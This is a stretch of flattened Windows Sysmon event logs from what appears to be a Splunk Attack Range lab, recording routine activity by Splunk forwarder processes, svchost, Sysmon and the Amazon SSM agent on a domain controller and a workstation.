10:33:21.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FB0DDC88D78C0226DADEBDF93142926,SHA256=C7CA9A2A78E8829087A3C17402142736267D4790AD70768EC9C816FF5F289534,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D71-6216-8D04-000000003802}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0D71-6216-8D04-000000003802}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.530{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D71-6216-8D04-000000003802}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.531{C8EA50B7-0D71-6216-8D04-000000003802}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000284463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.287{C8EA50B7-0D70-6216-8C04-000000003802}55242816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000284462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.549{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53174-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:22.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E736F05F2250653244AE025AABBB5619,SHA256=BA11D7009E5A54AB69E841BE2A987396C20EFC2AF251C809C493EE89A7EFFA68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:23.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F30BE3E9AB07787303B3AE8463EC227,SHA256=67465756B50754F4B32F09594A1FA0B21E5A9729FFF1EF14C672E4C645D3F2CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:23.004{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61734FB8B0EE1EFB7B6DF7FACABADC9,SHA256=261B53326B4C8E1AFAC64EFD839E0C281071BEC9CB07ED5985B4F16010875348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:24.696{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38BE5D6037CEF6A942107582BA3D921C,SHA256=19929E0102B913368E9F9E19A4D0CE8AAAEC4057AB1B58CBE5C5CDA8FD9EE247,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:22.690{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51134-false10.0.1.12-8000- 23542300x8000000000000000213615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:24.145{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8882B8C53E5A470C6CED00ED27161925,SHA256=60D7E5FD923C49CA5E71972F85DC8D260942937370F43E371C21ACF60A7AE004,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:25.715{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0EE1F6F551F03F57310AC487424F697,SHA256=D00DDCCCE7FB849C824E0860A7026148596E7D84286EB875ED989F50A5242918,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:25.270{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B415F3B0A2E0E86FC944CB7DC41E13F,SHA256=F2F285DC4F474E1AB2A0C65E031A1E1A0DF060C21DEBE1C4C6881CE2C1C643BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:26.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7960D317A6DFEDE29821B085C16CDE8D,SHA256=D60861315191C0A0360A7EE22A481A87917FCBC61F502F07F3149012E44748E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:26.332{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC67B27C56B11E63C807FDE61938D9A2,SHA256=1987BFBE18F1F92964B9099C7D0D0E501C4C5ADCC6B0D8BAB929501B56EB5577,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:27.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3405E4A9A5834D8E2610ABEFBDBE1284,SHA256=F0CB6B580D0436A129E794E53277BB099D9C6B7B506038615B138873E019AD32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:27.761{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9427FAA5AF78517517C7B2CA66F8798,SHA256=C7FB08C9B2CCC28168481F3AA987D353B74839143E82D8705EA6D20ABD558A23,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:24.724{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53175-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000213620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:28.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A13D5A83189AC545CBB63505899E011,SHA256=A15501CAFA613C3C76DB0BA8BBC03B8BD3F3DEE12BDB8E0A36546BF324E91B71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:28.814{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F57D329888A8DC12DDFD959E54542D2,SHA256=F3FF6A305AA02F7DD3B3229F29A8718A5C66706AAEDF3DFA65C57EAE22DA6D88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:29.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A8203E27CFB04BA8ED77AB51D578FD,SHA256=3444EB8F7FBE523C6442A9BF3F40483DB933E297FA31E0A40A7383E374C3DD15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:29.829{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668BAE49510DA1D063B09D8BC875CA39,SHA256=0A1ECC703BA6794D789CCDDC4A66349EB8D16A3F29DB7027BC78B79844B0C0F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:30.848{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B24BA1E102BB16B38DC67F90FBB13B8,SHA256=EF4D02DA387828D058C4733095EB3ED720ADECADAADF0F9CD36BF89D29571A78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:30.844{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C97F2A486037BAC0D7EE310159881FD7,SHA256=4194AAA62D29502F6CD5C4D8F032CF002D241F6C5C02FC65DF2747C1EF500FDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:30.223{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C46BB996393CFA04AA8EF499E3649E0B,SHA256=6B97D010943DB8D6473B37496FF1D8246B177162B4FD273C96B0D870EB8FDAA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:31.845{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79DAFB506D0714E9F90BA7C6E02F9A96,SHA256=522625C0B8A7516A142D0FBD4F5CFB7A490FCB993F1A4A0298176786AF7603B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:31.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713A2901B3968AE43B902F6577BA8FB0,SHA256=43DD89DBD8831713C1D8B87BA7B6688427DBB2C473870669C05EA00CC33525B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:28.471{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51135-false10.0.1.12-8000- 23542300x8000000000000000213627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:32.895{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C7EB1EE3ABE973796863AE2B1051DAB,SHA256=26F431FE30A35ADE26C4703E8E0225D4727B1E5E4F42007FED7817357C867274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:32.861{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3237461F9F7A78EE3EB8C11C0A1CC2,SHA256=3BF8B4449CF6860C13FC053061F06B32DAF63A2C83C2FEF3032BCF4175530EC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:32.382{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-117MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:33.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF26D7A3DEF4365A7C394095E5CD13A3,SHA256=40BDCDBC3A5B2B49FC90C04C3CD1DFBE0F4EF84516473E3FE5D3F1D66F9A872D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:33.877{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3886F8E09AEA1FF94D15A68F7E950BF,SHA256=6B3F1303BF63A33DBF4E41E268100952E4E63311B16AA096089F45F46E4B3D08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:33.381{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-118MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:30.554{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53176-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:33.230{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B6B1005DE87C92761D8A2945C916F028,SHA256=F166BBB82803136AA36CFC46A917EE6230328CAE4F249EF18E353B3030C6FBDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:34.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D105BBDA343D32C81AF35C582B910E0,SHA256=AAF3BBDC32BE41705A351A7C3B66DC2FFB999C37A2095BE4C466884885F6AAE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:34.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 